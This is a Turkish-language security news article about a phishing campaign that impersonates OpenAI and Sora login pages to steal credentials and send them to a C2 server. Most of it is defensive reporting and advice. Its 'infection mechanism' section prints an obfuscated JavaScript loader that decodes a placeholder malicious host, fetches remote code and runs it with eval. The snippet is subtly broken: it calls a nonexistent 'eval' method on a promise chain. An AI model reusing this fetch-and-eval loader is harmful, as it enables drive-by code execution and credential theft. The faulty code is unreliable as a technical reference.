Son haftalarda, hem OpenAI hem de Sora markalı giriş portallarının kimliğine bürünerek kurumsal ve tüketici hesaplarını hedef alan karmaşık bir kimlik avı kampanyası ortaya çıktı.
Saldırganlar, meşru hizmet bildirimleri olarak görünecek şekilde hazırlanmış e-postalar dağıtarak alıcıları hesabın askıya alınması veya olağandışı faaliyetler konusunda uyarıyor.
Bu mesajlar, kurbanları orijinal sitelerin düzenlerini ve SSL sertifikalarını yakından kopyalayan sahte giriş sayfalarına yönlendiren bağlantılar içerir.
İlk raporlar, çalışanların bu kimlik avı tuzaklarına tıkladıktan kısa bir süre sonra birkaç kuruluşun yetkisiz erişim girişimlerini bildirmesinin ardından ortaya çıktı.
Birim 42 araştırmacıları, bu kampanyanın arkasındaki tehdit aktörlerinin, gizlenmiş JavaScript ile yazılmış çok aşamalı bir yükleyici kullandığını ve kimlik bilgileri gönderildikten sonra kurban tarayıcılarına dinamik olarak kötü amaçlı yükler enjekte ettiğini belirledi.
Enjekte edilen kod, toplanan kullanıcı adlarını ve şifreleri, kullanıcıları meşru hizmete yönlendirmeden önce bir komuta ve kontrol (C2) sunucusuna sızdırarak ihlali etkin bir şekilde maskeliyor ve şüpheyi azaltıyor.
Bu gizli yaklaşım, saldırganların hem kurumsal hem de kişisel hesaplardan büyük miktarda kimlik bilgisi toplarken tespit edilmeden kalmasına olanak tanır.
Bu kötü amaçlı yazılımın etkisi oldukça büyüktür: Güvenliği ihlal edilmiş kimlik bilgileri, hassas verilere erişmek, yapay zeka modellerini değiştirmek veya güvenilir hizmetler kisvesi altında başka saldırılar başlatmak için kullanılabilir.
Tek Oturum Açma (SSO) çözümlerine güvenen kuruluşlar, çalınan belirteçlerin kurumsal ağlarda yanal hareket sağlaması nedeniyle özellikle savunmasızdır.
Güvenlik ekiplerine son oturum açma etkinliğini incelemeleri, çok faktörlü kimlik doğrulamayı (MFA) uygulamaları ve bilinen kötü amaçlı alan adlarına giden bağlantılar için giden trafiği izlemeleri önerilir.
Enfeksiyon Mekanizması
Bu kampanyanın merkezinde, kurbanın sahte sayfaya kimlik bilgilerini göndermesinden hemen sonra çalıştırılan JavaScript yükleyici yer alıyor.
Yükleyicinin kodu, özel dize kodlama rutinleri kullanılarak büyük ölçüde gizlenir. Yükleyicinin basitleştirilmiş bir alıntısı aşağıda gösterilmiştir: –
(function(){
const _0x3a5f=['fetch','then','text','eval'];
fetch(atob('aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZ2V0PWFqYXg='))
[_0x3a5f[1]](res=>res[_0x3a5f[2]]())
[_0x3a5f[3]](payload=>eval(payload));
})();Bu kod parçası, kodu çözüldükten sonra C2 uç noktasına ulaşır, daha karmaşık bir veri alır ve bunu kurbanın tarayıcı bağlamında çalıştırır.
Bu dinamik yükleme stratejisi, gerçek kötü amaçlı kod hiçbir zaman başlangıç sayfasında bulunmadığından imza tabanlı algılamayı zorlaştırır.
Kalıcılık, tarayıcının yerel depolama alanı ve oturum geri yükleme komut dosyaları kullanılarak sağlanır; kullanıcı çerezleri temizlese veya sekmeyi kapatsa bile yükleyicinin yeniden etkinleştirilmesi sağlanır.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
